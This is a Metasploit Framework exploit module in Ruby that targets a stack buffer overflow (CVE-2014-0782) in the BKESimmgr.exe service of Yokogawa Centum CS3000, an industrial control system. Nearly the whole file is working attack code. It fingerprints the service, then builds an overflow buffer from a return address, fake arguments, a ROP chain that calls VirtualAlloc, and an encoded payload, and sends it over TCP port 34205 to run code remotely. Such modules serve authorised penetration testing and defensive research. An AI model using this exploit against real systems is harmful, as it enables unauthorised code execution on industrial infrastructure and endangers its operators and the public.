GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
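class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. The single target carries the return address and the
  # two fake arguments used by #exploit; the comments next to each value name
  # the module they were taken from, so they are only meaningful for the
  # exact build listed in the target name.
  #
  # @param info [Hash] module info merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
        'Description' => %q{
          This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
          exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
          insecure usage of memcpy, using attacker controlled data as the size count. This module
          has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
          2003 SP2.
        },
        'Author' => [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
        'References' => [
          ['CVE', '2014-0782'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
        ],
        'Payload' => {
          'Space' => 340,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
            {
              'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
              'Offset' => 64,
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
              'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
            }
          ],
        ],
        'DisclosureDate' => '2014-03-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(34205)
      ]
    )
  end

  # Fingerprints the service without triggering the overflow: one packet
  # carrying four random alphabetic bytes is sent and the reply is inspected.
  # Only a reply of exactly 10 bytes whose three unpacked fields match
  # #valid_response? is treated as a positive.
  #
  # @return [Exploit::CheckCode] Appears on a matching reply, Safe otherwise
  #   (including no reply at all)
  def check
    res = send_pkt(create_pkt(rand_text_alpha(4)))
    return Exploit::CheckCode::Safe unless res && res.length == 10

    if valid_response?(parse_response(res))
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Builds the overflow buffer from the target hash (offset, return address,
  # two fake arguments, padding, ROP chain, encoded payload), wraps it in the
  # service's packet framing and sends it once. No response is read.
  def exploit
    bof = rand_text(target['Offset'])
    bof << [target.ret].pack("V")
    bof << [target['FakeArgument1']].pack("V")
    bof << [target['FakeArgument2']].pack("V")
    bof << rand_text(16) # padding (corrupted bytes)
    bof << create_rop_chain
    bof << payload.encoded

    data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
    data << [bof.length].pack("n")
    data << bof

    pkt = create_pkt(data)

    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
    connect
    sock.put(pkt)
    disconnect
  end

  # Returns the ROP chain as a packed little-endian DWORD string. The gadget
  # addresses come from the modules named in the inline comments and are
  # tied to the build listed in the target; the list is used verbatim.
  #
  # @return [String] packed gadget addresses
  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
        0x619436d3, # POP EBP # RETN [libbkeeda.dll]
        0x61615424, # & push esp # ret [libbkeldc.dll]
        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
        0x00000001, # 0x00000001-> ebx
        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
        0x00001000, # 0x00001000-> edx
        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
        0x00000040, # 0x00000040-> ecx
        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
        0x90909090, # nop
        0x619532eb # PUSHAD # RETN [libbkeeda.dll]
      ].pack("V*")

    rop_gadgets
  end

  # Wraps +data+ in the service framing used by both #check and #exploit:
  # a 4-byte big-endian operation id (always 1 here) followed by a 2-byte
  # big-endian length and the body itself.
  #
  # @param data [String] packet body
  # @return [String] framed packet
  def create_pkt(data)
    pkt = [0x01].pack("N") # Operation Identifier
    pkt << [data.length].pack("n") # length
    pkt << data # Fake packet

    pkt
  end

  # Opens a connection to RHOST:RPORT, sends +data+, reads whatever the
  # service returns in a single get_once and closes the connection.
  #
  # @param data [String] framed packet to send
  # @return [String, nil] the raw reply, or nil when nothing was received
  def send_pkt(data)
    connect
    sock.put(data)
    res = sock.get_once
    disconnect

    res
  end

  # Unpacks the first 10 bytes of a reply as three big-endian fields:
  # a 4-byte value, a 2-byte value and another 4-byte value.
  #
  # @param data [String] raw reply
  # @return [Array<Integer, nil>] the three fields (nil for missing bytes)
  def parse_response(data)
    data.unpack("NnN")
  end

  # True when the unpacked reply fields are (1, 4, 5).
  # NOTE(review): the previous condition tested data[1] == 4 twice; the
  # duplicate was dropped without changing which fields are compared.
  #
  # @param data [Array<Integer, nil>, nil] output of #parse_response
  # @return [Boolean]
  def valid_response?(data)
    return false unless data

    data[0] == 1 && data[1] == 4 && data[2] == 5
  end
end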